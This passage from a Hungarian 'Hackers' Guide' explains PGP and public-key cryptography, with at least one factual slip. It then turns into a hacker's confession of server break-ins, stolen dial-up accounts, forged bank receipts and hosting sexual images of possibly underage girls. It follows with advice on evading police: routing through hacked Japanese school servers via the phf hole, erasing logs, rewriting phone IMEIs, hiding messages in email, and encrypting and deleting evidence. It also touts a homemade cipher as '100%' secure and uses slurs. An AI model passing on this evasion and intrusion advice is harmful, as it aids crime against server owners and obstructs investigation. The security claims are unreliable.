7. Támadó (attacker, cryptanalist) - a rejtjelzett adat feltöroje<br />
8. Kriptológia (cryptology) - a titkosítást és a megfejtését is magában foglaló<br />
tudomány.<br />
9. Cipher - rejtjelzo algoritmus, a rejtjelzés során használt matematikai függvény.<br />
A következo a logikai útja az egész folyamatnak:<br />
NYÍLT SZÖVEG --> REJTJELZÉS --> TITKOSÍTOTT SZÖVEG --> VISSZAFEJTÉS -<br />
-> NYÍLT SZÖVEG<br />
A titkosítás egy matematikai tudomány. Matematika használatával rejtjelzi /<br />
visszafejti az adatot a tároláshoz, vagy a hálózaton való továbbításhoz (pl. az<br />
interneten keresztül).<br />
A titkosítás fobb típusai<br />
A titkosítás fobb típusai a "gyenge" és az "eros". A titkosítás erossége attól függ,<br />
hogy mennyi idore és eroforrásba kerül, hogy visszakapd a nyílt szöveget. A jelen<br />
cikk írásának pillanatában a Földön létezo összes számítógép együtt nem volna<br />
képes feltörni egy eros kulcsot. De soha nem tudhatod - a holnap hozhat sokkal<br />
erosebb számítógépeket, vagy valaki találhat egy matematikai megoldást a<br />
visszafejtésre anélkül, hogy tudná a jelszót.<br />
Hogyan muködik a titkosítás?<br />
A cipher valamilyen kifejezést/szót/számokat (kulcs), és egyéb adatokat használ<br />
ahhoz, hogy rejtjelezze a nyílt szöveget. Különbözo kulcsok természetesen más<br />
rejtjelezett szöveget adnak végeredményül. A rejtjelezett adat erossége két dologtól<br />
függ: a cipher erosségétol és a kulcs erosségétol. Éppen ezért a kulcsot megfeleloen<br />
kell megválasztani és tárolni (ha lehet, akkor meg kell jegyezni :) Mindezek a dolgok<br />
együttesen adják a titkosítási rendszert (cryptosystem).<br />
Hagyományos titkosítás<br />
A rejtjelezo algoritmus itt egyetlen kulcsot használ a rejtjelezéshez és a<br />
visszafejtéshez. Erre egy példa a DES (Data Encryption Standard), amelyet széles<br />
körben használnak a Szövetségi Kormányzásban (USA - Federal Government). A<br />
hagyományos titkosításnak elonyei és hátrányai is vannak. Eloször is - nagyon<br />
gyors, és olyan adatok rejtjelezésére kiváló, amelyet senki más nem fog használni a<br />
tulajdonosán kívül. Emiatt - a kulcs biztonságos átadása nagyon nehéz manapság:<br />
mielott más is el tudná olvasni az adatot, elotte át kell neki adnod a kulcsot, ami nem<br />
68
Hackers’ Guide<br />
praktikus, mert nem bízhatsz meg a telefontársaságokban, postában, az e-mailben<br />
és egyéb internetes szolgáltatásokban. Felmerül a kérdés: hogyan juttatod el a<br />
kulcsot a címzetthez, anélkül, hogy más is hozzájuthasson? A válasz erre ma a:<br />
Nyilvános kulcsú titkosítás (áttekintés)<br />
Ez megoldja a kulcscsere problémáját. Whitefield Diffie és Martin Helman vezette be<br />
a nyilvános kulcsú titkosítás módszerét 1975-ben. Pletykák szólnak arról, hogy a Brit<br />
Titkosszolgálat is feltalálta néhány évvel azelott, de titokban tartották és nem<br />
csináltak vele semmit.<br />
A nyilvános kulcsú titkosítás aszimmetrikus rendszer, és két kulcsot használ<br />
(kulcspár): egy nyilvános kulcsot (public key), amelyet a rejtjelezésnél használnak, és<br />
egy titkos kulcsot (private key), a visszafejtéshez. A nyilvános kulcsot világszerte<br />
közzéteszik, de a titkos kulcsot titokban tartják. Bárki és bármi rejtjelezhet a te titkos<br />
kulcsoddal, de csak te (vagyis pontosabban az a személy, aki birtokában van a titkos<br />
kulcsnak) tudja visszafejteni a rejtjelezett szöveget.<br />
Most visszatérünk a PGP-hez<br />
A legnépszerubb titkosítási rendszerek egyike a PGP (Pretty Good Privacy). Ahogy<br />
fentebb már szó volt róla, a PGP hibrid titkosítási rendszer - tehát kombinálja a<br />
hagyományos és a nyilvános kulcsú titkosítást. A PGP a következo módon muködik:<br />
A) Rejtjelezés:<br />
1) Eloször a PGP tömöríti a nyílt szöveget. Ez több okból hasznos: kevesebb helyre<br />
lesz szükség a lemezen, a kisebb üzenet kevesebb idot jelent (az ido pedig pénz),<br />
amikor az interneten keresztül küldöd; továbbá növeli a titkosítás erosségét, mert a<br />
tömörített adatban kevesebb minta van, mint a nyílt szövegben, és a mintákat<br />
gyakran alkalmazzák a támadók, hogy megtörjék a rejtjelet... (pl. elemzik, hogy<br />
melyik betu fordul elo legtöbbször, és feltételezik, hogy az a "t" betu, stb. -Voyager2)<br />
2)a PGP azután generál egy egyszer használatos titkos kulcsot, amelyet néha<br />
session-kulcsnak is neveznek. Ez egy véletlenszám, véletlen adatokból eloállítva,<br />
amelyek az egered mozgatásából és a billentyuleütésekbol származnak, valamint a<br />
CPU zajából. Egy nagyon gyors és eros hagyományos titkosítási algoritmussal<br />
elkódolja a nyílt szöveget, és eloállítja a rejtjelezett szöveget.<br />
3) Az adat titkosítása után a session-kulcsot rejtjelezi a címzett nyilvános kulcsával<br />
(akinek az üzenetet küldjük), és azután ezt a rejtjelezett session-kulcsot és a<br />
rejtjelezett szöveget elküldi a címzettnek.<br />
B) Visszafejtés:<br />
1) A címzett ugye megkapta az üzenetet, és a titkos kulcsával visszafejti a sessionkulcsot.<br />
2) A session-kulcsot használva visszafejti a hagyományosan titkosított rejtjelezett<br />
szöveget.<br />
3) Megszünteti a tömörítést.<br />
A hagyományos és nyilvános kulcsú titkosítás kombinálása nagyon gyors és eros<br />
titkosítási rendszert eredményez. Ez a hagyományos titkosítás gyorsasága és a<br />
nyilvános kulcs biztonsága miatt van.<br />
Néhány szó a kulcsokról...<br />
69
Hackers’ Guide<br />
A kulcs egy szám, amelyet a rejtjelezo algoritmus a rejtjelszöveg eloállításához<br />
használ. Ezek valójában óriási számok. A kulcs méretét bitekben jelzik, minél<br />
nagyobb a kulcs, annál titkosabb a rejtjelszöveg. A hagyományos és a nyilvános<br />
kulcsok méretének összehasonlítása érdekes - a hagyományos 128-bites kulcs<br />
ugyanolyan erosségu, mint egy 3000 bites nyilvános kulcs. De nem hasonlíthatod<br />
össze ezeket a típusokat, mert más-más algoritmusban használatosak (nem<br />
ugyanaz, hogy Bakonyban a tanya, vagy takonyban a banya, igaz-e?)<br />
A legmagasabb szintu biztonság eléréséhez mindig a legnagyobb méretu kulcsot<br />
válaszd, mert elég idot és eroforrást feltételezve a titkos kulcs megfejtheto.<br />
A kulcsokat titkosított formában tárolja a PGP. Általában két "keyring"-et használ<br />
(ezek fájlok a lemezen) - az egyiket a nyilvános kulcsoknak, a másikat a titkosnak.<br />
Ne veszítsd el a titkos keyringet, mert minden adat, amely ezekhez a kulcsokhoz lett<br />
titkosítva, soha többé nem kerülhet visszafejtésre.<br />
.. és a digitális aláírásokról<br />
Ahogy a kézzel írt aláírások is, a digitális aláírás azonosítja az információ eredetét.<br />
Gyakran ez a tulajdonsága a titkosításnak gyakrabban használatos, mint a<br />
rejtjelezés. A digitális aláírást "lehetetlen" hamisítani. Röviden - amikor digitális<br />
aláírással van dolgod, biztos lehetsz benne, hogy a megfelelo ember írta alá az<br />
adatot.<br />
A digitális aláírás a következoképpen muködik:<br />
1) A nyílt szöveget titkosítják a TITKOS kulcsoddal.<br />
2) Ha rejtjelezett szöveg visszafejtheto a NYILVÁNOS kulcsoddal, akkor az adat<br />
toled származik.<br />
Ez az eljárás lassú és nagy mennyiségu adatot állít elo, amely nem szükséges az<br />
aláírás ellenorzéséhez. Ezért találták ki a Hash függvényeket. Ezek növelik az<br />
aláírás hatékonyságát. A hash függvény egy akármilyen bemeneti szövegbol eloállít<br />
egy fix hosszúságú kimeneti szöveget (kivonat - digest). A matematikai oldalról<br />
nézve a függvényt, a bemeneti szövegben történo akár csak egy kis apró változás<br />
teljesen más kivonatot fog eredményezni. Na és ezt a kivonatot titkosítják a titkos<br />
kulcsoddal (ez az aláírás), és elküldik a nyílt szöveggel együtt a feladónak. A hash<br />
függvény biztosítja, hogy senki nem hamisíthatja sem a szöveget, sem az aláírást,<br />
mert ebben az esetben az aláírás megbukik az ellenorzésnél.<br />
A digitális aláírás a fo útja annak, hogy egy nyilvános kulcs érvényességét<br />
leellenorizzük.<br />
Digitális tanúsítványok (Digital certificates)<br />
Természetesen amikor a nyilvános kulcsú titkosítást használod, akkor biztos akarsz<br />
lenni abban, hogy a megfelelo ember kulcsával rejtjelezel. Itt jön a bizonyosság<br />
problémája. Tegyük fel, hogy valaki egy hamis kulcsot küld neked egy másik ember<br />
nevében, akinek írni akarsz. Amikor rejtjelezed az adatot és elküldöd a "címzettnek",<br />
az adat a rossz embernek fog menni. A nyilvános kulcsú környezetben nagyon<br />
fontos, hogy tudd, hogy a megfelelo nyilvános kulcsot használod a megfelelo<br />
címzetthez. Ennek egyik útja, hogy csak azokhoz a kulcsokhoz rejtjelezel, amelyeket<br />
személyesen adtak neked (pl. floppy lemezen). De ez kényelmetlen - eloször is<br />
elofordul, hogy nem is ismered a címzettet, másodszor hogyan küldesz adatot<br />
70
Hackers’ Guide<br />
olyasvalakinek, aki éppen nem elérheto fizikailag (egy repülogépen ül, vagy akármi) -<br />
postagalambot küldesz egy üzenettel?<br />
A digitális tanúsítvány egyszerusíti ezt a folyamatot azáltal, hogy megkeresi a<br />
megfelelo kulcsot. A tanúsítvány olyan adat, amely hasonló módon értelmezheto,<br />
mint a hagyományos tanúsítványok. Ez az információt a nyilvános kulccsal együtt<br />
segítséget nyújt a kulcs érvényességének leellenorzésében. A tanúsítvány<br />
megakadályozza, hogy valaki kicserélje más nyilvános kulcsát valami más kulcsra.<br />
A digitális tanúsítvány a következokbol áll:<br />
1) A nyilvános kulcs<br />
2) tanúsítvány-információ (némi info a felhasználóról, név, ID, stb)<br />
3) legalább egy digitális aláírás (egy harmadik fél által, akiben megbízol).<br />
A digitális aláírás egy tanúsítványon azt jelzi, hogy a harmadik fél elfogadta a<br />
tanúsítvány-információt. A digitális aláírás nem jelenti a teljes tanúsítvány<br />
érvényességét; csupán azt jelzi, hogy az aláírt információ az adott nyilvános kulccsal<br />
összetartozik. Röviden - a tanúsítvány egy nyilvános kulcs néhány személyes<br />
információval digitálisan aláírva, és egy harmadik fél által hitelesítve. A legnagyobb<br />
elony, amelyet a digitális tanúsítvány használatával nyersz, hogy mikor kicseréled a<br />
nyilvános kulcsodat valaki mással, nem kell fizikailag jelen lenned. A fizikai<br />
kulcscserének vannak elonyei, de csak egy bizonyos pontig.<br />
Vannak rendszerek, amelyek sok tanúsítványt tárolnak összegyujtve, hogy bárki<br />
ellenorizhesse egy adott kulcs érvényességét. Ezeket hívják tanúsítványszervernek<br />
(Certificate Servers/Systems). Egy tanúsítványszerver nem más, mint egy adatbázis,<br />
amely lehetové teszi felhasználóknak, hogy tanúsítványokat hozzanak létre és<br />
töltsenek le.<br />
Tanúsítvány-formátumok<br />
Egy digitális tanúsítvány sokféle személyes információt tárol a felhasználóról, a<br />
nyilvános kulccsal együtt, és valaki által aláírva, akiben megbízol. A PGP-re<br />
visszatérve, két tanúsítvány-formátumot támogat:<br />
1) PGP tanúsítványok<br />
2) X.509 tanúsítványok.<br />
Egy PGP tanúsítvány az alábbi dolgokból áll:<br />
1) A PGP verziószáma, amellyel az adott kulcs készült.<br />
2) A tanúsító nyilvános kulcsa a kulcshoz tartozó algoritmussal együtt, amely RSA,<br />
DH és DSA lehet.<br />
3) A tanúsítvány érvényességi ideje, ez jelzi, hogy meddig érvényes az egész.<br />
4) A kulcshoz tartozó hagyományos titkosító algoritmus neve. Ez mutatja, hogy a<br />
tanúsítvány tulajdonosa milyen módon preferálja a neki küldött adatok titkosítását.<br />
Ezek lehetnek: CAST, IDEA vagy Triple-DES (3DES néven is emlegetik).<br />
Érvényesség és bizalom<br />
Az érvényesség bizalom valamiben, hogy az tényleg a tulajdonosához tartozik.<br />
Például a nyilvános kulcs, vagy a tanúsítvány. A bizalom nagyon fontos a nyilvános<br />
kulcsú rendszerekben, ahol tudnod kell, hogy egy tanúsítvány érvényes-e vagy nem.<br />
71
Hackers’ Guide<br />
Amikor biztos vagy benne, hogy egy tanúsítvány a megfelelo személyhez tartozik,<br />
akkor megjelölheted a kulcsát a keyringeden, ezzel jelzed magadnak, hogy<br />
ellenorizted a tanúsítványt és érvényes. Ha elküldöd az aláírást egy tanúsítványszervernek,<br />
akkor mások tudni fogják, hogy te tanúsítottad az érvényességét. Ahhoz,<br />
hogy higgy valakinek, aki tanúsította valamely tanúsítvány érvényességét - bíznod<br />
kell benne.<br />
Az érvényességet úgy is leellenorizheted, hogy találkozol a címzettel és fizikailag<br />
átveszed tole a kulcsot. A másik módja ennek az "ujjlenyomatok" (fingerprints)<br />
használata. Egy PGP ujjlenyomat egy tanúsítványból keletkezik egy hash függvény<br />
segítségével. Minden ujjlenyomat egyedi. Általában hexadecimális formában, vagy<br />
néhány szó formájában jelenik meg. Amikor van ujjlenyomatod az adott<br />
tanúsítványról, és ismered a címzett hangját, felhívhatod, hogy olvassa fel az övét -<br />
ha egyeznek, akkor o a kulcs birtokosa. De sokszor nem ismered a hangját - ekkor<br />
egy harmadik félhez kell fordulnod (egy tanúsítvány-szerverhez).<br />
De ne feledd, hogy - hacsak a kulcs tulajdonosa nem adta át neked fizikailag - egy<br />
harmadik félben kell bíznod.<br />
Jelszavak és jelkifejezések (passphrases)<br />
Majdnem minden nap, amikor számítógépeket használsz, be kell írnod egy titkos<br />
karakterkombinációt, egy jelszót, hogy hozzáférhess valamilyen információhoz. Ezek<br />
tehát ismerosek. Ha nem - hoppá, akkor rossz cikket olvasol :)<br />
Egy jelkifejezés a jelszónak egy hosszabb formája, sokkal biztonságosabb ilyet<br />
használni. A jelkifejezés segít, hogy nagyobb biztonságban legyen az adat olyan<br />
támadásokkal szemben, amelyek szótári szavakat használnak. A legjobb<br />
jelkifejezések hosszúak és bonyolultak, és mindenféle karaktert tartalmaznak. A PGP<br />
jelkifejezést használ a titkos kulcsod rejtjelezésére a titkos keyringen. Ezt a<br />
jelkifejezés-bol vett hash segítségével teszi. A titkos kulcsod használatához ismerned<br />
kell a jelkifejezést. A jelkifejezésnek olyannak kell lennie, hogy ne felejtsd el, de<br />
mások nehezen találhassák ki. Valami olyasmit válassz, amely a hosszú-távú<br />
memóriádban már berögzült, inkább ne találj ki valami teljesen új dolgot. Ha<br />
elfelejted a jelkifejezést, a titkos kulcsod teljesen használhatatlanná válik és az ehhez<br />
tartozó nyilvános kulccsal rejtjelezett adatokat sem tudod majd visszafejteni.<br />
************************************************************************************************<br />
A paranoiáról<br />
Pár napja még nem gondoltam volna, hogy azt fogom írni, amit itt most írni készülök.<br />
És aztán egyik napról a másikra BUMM, bejöttek a dolgok, szépen sorra, és most<br />
meg a laza naív gyerekből paranoiddá váltam. Igaz, már egy ideje feladtam a<br />
hackelést a nagyvilágban, csak akkor ugrok neki valaminek, ha a saját<br />
72
Hackers’ Guide<br />
szempontomból fontos, de mégis, tudtára kell adnom minden hozzám hasonló<br />
gondolkodásúnak, hogy változtak a dolgok. Mielőtt még elálmosodnál, elmondom,<br />
hogy nem csak pofázni fogok oldalakon keresztül, adok ötleteket, segédprogramokat.<br />
Tudjátok, egy éve egy skót haverom letiltották a szolgáltatójánál, csak mert letöltött<br />
egy file-t a netről, ami hackeléssel kapcsolatos. Kiröhögtem, hogy hogy lehet ilyen<br />
körülmények között internetezni, hogy minden egyes fingását nézik az embernek.<br />
Most kiderült, hogy magyarország sürgős ütemben halad a "nyugati" irányba. Az<br />
amerikaiaknál teljes paranoia van, amit én régen nem érthettem meg, de egyre<br />
jobban kezdem komolyan venni. Néhány hír a közelmúltból...<br />
A napok eseményei<br />
Ez egy kisebb eset: a gyerek velem együtt felnyomott egy japán szervert az<br />
iskolájából. Nem is titkolom, az eötvös józsef gimiben történt az eset. Nem sok idő<br />
múlva a gyerek ki lett tiltva, mert a japánok írtak a suliba, hogy a suli IP címéről<br />
nyomultak be.<br />
Elkobozták számítógépét, és kártérítést fizettettek meg egy budapesti fiatallal, aki<br />
egy matávnet felhasználó hozzáférését használta az internetezésre. Amikor az<br />
előfizető reklamált, a matávnet belenézett egy-két logfile-ba, és kapásból<br />
megmondták a telefonszámát, a csalót a rendőrség kézrekerítette.<br />
Egy politikust, volt polgármestert letartóztattak. Állítólag illegális (/pedofil?)<br />
képeket terjesztett a neten. Akárhogy is volt, az elender kiadta felhasználóját. Nem<br />
csak hogy a felhasználónevet nyomozták ki, megmondták a pontos telefonszámot,<br />
ahonnan a netet hívták a bizonyos időkben, amikor a képek terjesztése történt.<br />
Kinyomozták az OTP nyugta hamisító kilétét. Valaki beszkennelt egy OTP<br />
bizonylatot, profin átírta, mintha a nyugta 2000-ben 1990-et írt volna ki dátumként, a<br />
képet felrakta a netre, ezzel rossz helyzetbe hozta a bankot, mintha nem készült<br />
volna fel megfelelőképpen a dátumváltásra. Megint, a személy kilétét kinyomozták,<br />
aki azóta elnézést kért a banktól, állítása szerint "nem mérte fel cselekménye"<br />
következményeit.<br />
Barátom az elender meghackelést követően kapásból felrakta az extrára<br />
"elendersux" azonosítóval a meghackelt elender lapot. Azt, amit mindenkinek joga<br />
van látni. A hozzáféréseket úgyis már letiltották. De mégis, fél nap se telt bele, és az<br />
extra letörölte, az elender kérésére. Nem le kell törölni más lapját, hanem meg kell<br />
védeni a saját rendszert, úgy, hogy nem windows-buzi "szakemberekkel" készítteted<br />
el a rendszered. A rendőrség, és úgy általában mindenki véres hadjáratot indított a<br />
"hackerek" ellen.<br />
Konklúzió<br />
Most rájöttem, nem azért nem buktam idáig le semmivel, mert nem tudták<br />
lenyomozni, meg nem érdekelte a szolgáltatót. Senki sem jelentett fel. Én is lopott<br />
matávnetes accot használok, mint még rajtam kívül legalább ezer ember, nem<br />
ismerem a statisztikát. Csináltam már hasonló hamisítványokat, mint az OTP-s<br />
ügyben. Az XXX szexképek-részben sem biztos, hogy mindegyik, a képen szereplő<br />
lány betöltötte 18. életévét. Fogalmam sincs, mivel nekem is csak küldték őket, én<br />
meg a látogatottságért felraktam őket. A hacklife-ban is vannak illegális dolgok<br />
bőven. A novell - hackelés sem hiszem, hogy nagyon törvényszerű lenne. Na és a<br />
"beszólások" részben, hogy nem cenzoráltam az emberek beszólásait? Meg a<br />
vírusok, amelyekhez a lapomon mindenki hozzáférhet? És akkor még nem<br />
beszéltem az Anarchista "főzőcskekönyv"-ről, ami a Textek részben van, minden le<br />
van benne írva, hogy kell valakit megölni, puskaport készíteni, vagy macskabombát.<br />
73
Hackers’ Guide<br />
Tovább fokozom: MP3. Többet nem is kell mondanom. Ez már teljesen illegális<br />
dolog. Megfosztom szegény zeneszerzőket attól, hogy 10-szer jobban éljenek egy<br />
átlagembernél, csak 9-szer élnek jobban, mert csomó ember a netről leszedi a<br />
számukat. Persze hogyha én nem lennék, akkor mindenki megvenné a K*RVA drága<br />
CD-t, de mivel én ide felrakom a számokat MP3-ban, ezért a látogatóim nem veszik<br />
meg a szerző termékét, amiből úgyse az énekes, hanem a kiadó gazdagodik meg.<br />
És most meg töröljek le mindent? Akkor végre nem éheznének az énekesek? Na<br />
jólvan! Mégis, tudom, hogy egyszercsak egy extrásnak, vagy egy matávnetesnek,<br />
vagy egy fakabátnak fel fog tűnni a lapom, vagy hogy nem csak a saját<br />
hozzáférésem használom, és akkor vagy lebukok kicsit, vagy lebukom nagyon...<br />
jönnek hozzám is elkobozni mindent. Aztán max. 1 leszek a sok hír közül. És<br />
ugyanez most már megtörténhet bárkivel. Ha hekkerkedésre adod a fejed akkor<br />
számíts arra, hogy bármikor egy papírkosárba hullhat. Most ennek az elkerülésére<br />
nyújtanék egy-két ötletet, illetve programot.<br />
Útvonal<br />
Bárhova telnetelsz, webelsz, bármi rád nézve terhelőt csinálsz, használj néhány<br />
közbeiktatott szervert. Azt, hogy részletesen hogy kell ezt csinálni, itt nem tudom<br />
leírni, az hosszú, és részletes. Kiindulásnak ajánlom pl. a webprovider-t, egy<br />
független ingyenes szolgáltatót, ahol saját domaint kapsz, és telnet lehetőséged is<br />
van. De persze ez magában nem elég, kell keresni a hálón kisebb japán szervereket,<br />
pl. iskolai szervereket, ezekbe nagyon könnyű bejutni, már milliószor csináltam, nem<br />
kell hozzá extra ész, 10%-on működik legalább a phf-lyuk, akármikor kinyomtathatsz<br />
egy japán suliban egy levelet az ottani nyomtatóra :) De mégjobb ha mondjuk van<br />
ismerettséged egy suliban, és ott helyileg behackelődsz, így telnetet meg egyebeket<br />
teremtve magadnak. Ez nem is nehéz dolog. Aztán ha már van 1-2 védelmed, akkor<br />
ha épp betelnetelni készülsz a célponthoz, menj keresztül ezeken a szervereken<br />
egy-párszor, és amikor csak lehet, tűntesd el a logfile-okból magad, ha van rá<br />
lehetőséged. Tudom, hogy ez kibaszottul kurvára sok munka, de ha valami tényleg<br />
nagyra készülsz, akkor nem lenne jó lebukni, nem? Vagy ha ezek a módszerek nem<br />
mennek még nagyon, akkor az is jó, ha az alapvető lebukási lehetőséget kiiktatod,<br />
mert csak úgy juthatnak el hozzád, ha a saját net hozzáférésed használod, vagy a<br />
saját telefonszámod. Tulajdonképpen ha mindkettőt ki tudod iktatni, akkor már nem is<br />
kell varázsolnod logfileokkal meg egyebekkel.<br />
Végső akció kivitelezés<br />
Folytassuk csak onnan, ahol abbahagytuk! Tehát valami nagyra készülsz... már<br />
tudod, hogy mit hogy, satöbbi.... tegyük fel, hogy már meg is szereztél egy jelszót, és<br />
fel akarsz tölteni egy új lapot a célpontra. Nézzük csak, milyen célpontjaid lehetnek:<br />
Saját suli: ehhez nem kell varázsolgatni, csak töltsd fel, nem fog a sulid a<br />
szolgáltatóhoz menni, hogy elkérje a usernevet, meg a telefonszámot. De utána<br />
kussolj, nem kell reklámozni, hogy te voltál<br />
Vállalati, céges lapok: Én vigyáznék a helyedben...<br />
Közismert, nagy látogatottságú lapok: 100% PARANOIÁVAL, lásd később...<br />
.MIL, .GOV, és társaik: Felejtsd el, ne legyél hülye. Ne kezdjél el baszakodni velük.<br />
Ha nagyon akarod, akkor 100% PARANOIÁVAL (lejjebb írok róla...), bármit is<br />
74
csinálsz.<br />
100% PARANOIA<br />
Nézzük csak, milyen nyomok vannak, ami alapján téged, mint személyt<br />
beazonosíthatnak!<br />
Egyrészt, kezdjük ott, hogy ha valami vindózos fosod van, mint nekem, akkor<br />
felkapcsolódásnál kb. 4-5 adatot közöl a dialup a szerverrel..... múltkor egy<br />
számítógépet közbeiktattam fizikailag a modem és a gépem közé. Loggoltam<br />
MINDENT ami a modem és a szerver között ment. Valami ilyesmi jött ki:<br />
AT<br />
ATE0V1<br />
ATX4<br />
ATDT0651201201<br />
~blablablablablg mindenféle szarság<br />
usernév/jelszó, blablablablablablablabla mindenféle szarság<br />
blablablablaMAD MIND, blabla, DIGITAL NEXUS, blabla, MAD MIND<br />
blablabla, MACRI, bla blablablablablablablablablablabla<br />
MAD, blablablablablablablablabla<br />
Hackers’ Guide<br />
Ugye milyen kellemes? Tudtál erről? És tudsz még a 20 másik dologról, ami alapján<br />
a GÉPED beazonosíthatják? Mert hiába csinálsz mindent más vonalról, más<br />
usernévvel, ha ezt a fajta infót is loggolják, akkor tudják, hogy ugyanaz a gép, amivel<br />
valaha már felmentél a netre, mondjuk a saját loginoddal, a saját telefonszámodon,<br />
vagy írtál egy emailt, amiből kiderült, hogy ki voltál. Visszakereshető, rizikós. Épp<br />
ezért kell átnézni a REGISTRY-t (windowsban...), hogy milyen infó van, amit nem<br />
szeretnél, hogy lássanak, mint az én példámban, ahol 2-szer benne volt, hogy "MAD<br />
MIND", a nickem, egyszer, hogy "MAD" mint vezetéknév, "MACRI", mint a windows<br />
usernevem (ezt mi a FASZNAK kell tudniuk?!), és a "Digital Nexus", mint vállalatnév,<br />
ez esetben egy régi hacker csapat, aminek tagja voltam. Ugye kellemetlen? Erre<br />
megoldás, hogy dialin accot szerzel egy iskolában (lehetőleg nem a sajátodban), és<br />
ott talán nem loggolnak ennyi infót. Következő állomás (természetesen most a lehető<br />
legparanoidabb, de azért még reális védekezésről beszélek egy nagyobb méretű<br />
akció előtt, nem azt mondom, hogy mindig így kell :))): Veszel egy pannon<br />
praktikumot, vagy egy westel dominót. Még jobb, ha ericssonod van, azzal állítólag<br />
könnyű átírni a kártya IMEI számát, így azonosítatlanul telefonálhatsz, és még<br />
ingyen is. Ha megvan, egyszerűen felcsatlakozol a megtervezett módon a netre, és<br />
nekilátsz. így már fasz se fog kinyomozni, remélhetőleg. Persze nem kell azt se<br />
hinni, hogy ott a rendőrségnél meg általában mindenhatóak a "szakemberek". Ha<br />
eléggé óvatos vagy, nem fognak megtalálni.<br />
HÉTKÖZNAPI PARANOIA<br />
Amikor épp csak beszélgetünk, tervezünk valamit, akkor sem árt vigyáznunk a<br />
levelezéssel. Tudod te, hány szerveren keresztül megy egy email amit elküldesz?<br />
Tudod hány helyen tudják azt leszedni? A válasz három betű: SOK. Túl sok ahhoz,<br />
hogy te bármiféle illegalitást emailben megbeszélhess nyugodtan. Van mindenféle<br />
titkosítóprogram, de akkor már rég rossz, ha titkosított file-okat küldözgetsz a<br />
címzettnek. E-Mailezésre ajánlok egy programot, amit a skót haverommal<br />
használtunk jó hosszú ideig. Láttad a "The Saint" c. filmet? A magyar címe meglepő<br />
módon "Az angyal" volt. Onnan merítettem az ötletet. Jön egy email, amiben a feladó<br />
az időről kérdez, leír egy karfiolos besameles receptet, és üdvözli a testvéreidet.<br />
75
Hackers’ Guide<br />
Ekkor te ráuszítod a programot, ami kiszed belőle néhány betűt, összerakja őket, és<br />
ott is van a szöveg: "HOLNAP 6-KOR FELBASSZUK A MATÁVNETET". Egész jó<br />
ötlet, nem? És az a vicces benne, hogy senki se tudhatja, hogy a levélben már szinte<br />
SZÓ SZERINT a sorok között van a tartalom. A program neve "HÁLÓ", mivel úgy<br />
működik, mint egy háló. Akivel levelezni akarsz ilyen módon, annak floppyn odaadod<br />
a "HÁLÓ"-mintát, amin a lyukak helyei vannak, és már mehet is a levelezés. Bővebb<br />
információt a programot kitömörítve találhatsz. Itt a link: HALO.ZIP. Eléggé kicsi a<br />
progam ahhoz képest, hogy mennyire hasznos, igaz, DOS-ra írtam, de attól még<br />
tökéletesen lehet használni.<br />
ADATTÁROLÁS<br />
Naja... adattárolás. Ha olyasmit csinálsz (márpedig ha ezt olvasod, akkor foglalkozol<br />
vele), ami nem totálisan legális, egyáltalán ne lepődj meg, ha egy nap jön pár<br />
civilruhás ember, néhány egyenruhás kíséretében, és "lefoglalnak", "elkoboznak",<br />
"kutatnak". Mindegyik lényege ugyanaz.... Felkapják a gépet, és viszik. Épp ezért,<br />
bármi olyat tárolsz a gépeden, ami neked fontos, de "lefoglalási" szempontból<br />
kellemetlen lenne, azt titkosítsd, ideiglenesen. Erre a feladatra van már egymillió<br />
program, de az az igazság, hogy sohasem tudhatod, hogy melyik az, amelyik tényleg<br />
eléggé erős védelemmel van ellátva. Én megoldottam ezt a problémát: írtam egy<br />
saját titkosító programot. Olyan matematikai algoritmusokat tettem bele, amelyeknek<br />
a tulajdonságaival én sem vagyok teljesen tisztában. Háromféle, dokumentálatlan<br />
titkosítási módszert használok benne. Szép felülete van, és ez az egyetlen program,<br />
amiről biztos vagyok, hogy 100%-os védettségben tartja azt, amit titkosítok vele.<br />
Nem nagy file-okra terveztem, mert eléggé lassú archiválásra, de egy-két tömörített<br />
file-t lazán lehet vele titkosítani, és ha biztosan tudják, hogy egy négybetűs jelszavat<br />
választottál magadnak, akkor is kb. 100 év, amíg megfejtik. Szóval ez az amit én<br />
védelemnek nevezek. És annyira rohadtul biztos, hogy még a forrását is kiadom.<br />
Szép pascal program. Tehát, itt lehet leszedni: SICRIT.ZIP, program, forrás, és<br />
dokumentáció egyben. Tehát ha már megvan, hogy mivel titkosítasz ideiglenesen<br />
fileokat, akkor mondok egy tuti tippet a biztonságra: rendszeresen MENTSÉL, és<br />
TÖRÖLJ! Ugye, nem is bonyolult? Nem árt, ha van CD íród, sőt, nagyon jó. Ha<br />
mindened megvan CD-n, akkor lefekvés előtt már törölhetsz is esténként. Most<br />
hülyének nézel biztos, de ha lesz belőled valami, azonkívül, hogy lószar, tetű, vagy<br />
lábtörlő, akkor potenciális esélyed van arra, hogy egyszercsak kijöjjenek hozzád.<br />
Gondolj csak bele a példák alapján: gondolta volna a gyerek aki kapott a haverjától<br />
matávnetes accot, hogy kijönnek hozzá? Gondolta volna a lamer, aki back orifice-el<br />
etetett be embereket, és úgy szerzett hozzáféréseket? Sőt, a legjobb - gondolta<br />
volna a srác aki átírta a 2000-et a bizonylaton 1990-re paintbrushban, és CSAK<br />
FELRAKOTT EGY JPG-t A NETRE ami egy hamisított, poénból beszkennelt otp<br />
bizonylat volt, hogy kijönnek, és elkobozzák a gépét? Vagy az élet & irodalom<br />
szerkesztője, aki - igaz, nem hekkeléssel, de mégis - publikált titkos, vagy talán nem<br />
is létező adatokat, hogy felforgatják a lakását? Egyre gyakrabbak ezek az esetek, és<br />
sohasem tudni, ki lesz a következő nevetséges áldozat. Én talán már be vagyok<br />
biztosítva. És te?<br />
************************************************************************************************<br />
76
Hack Windows alól és tudnivalók<br />
Hackers’ Guide<br />
Elorebocsatjuk, hogy ezen anyag teljes mertekben a mi muvunk, nem forditas (egyes<br />
reszek kivetelevel, ahol ezt jelezzuk), es nem masolas. Egyetlen resze sem atvett<br />
anyag. Szabadon terjesztheto, formazhato DE: tartalmi valtoztatas nelkul, a nevunk<br />
lathato kiirasaval. (Lehetoleg nem fekete alapon feketevel, es nem ket pontos<br />
betumerettel :) Bocs hogy egyszer egyes szamban maskor tobbesben beszelunk<br />
magunkrol, de az anyag munkamegosztasban keszult.<br />
A szakerto es sok eve a szakmaban tevekenykedo hackerek valoszinuleg nem sokra<br />
mennek ezzel az anyaggal, nem elsosorban nekik, hanem azoknak az embereknek<br />
keszult, akik felhasznaloi szinten mar regota hasznaljak a szamitogepet, de meg<br />
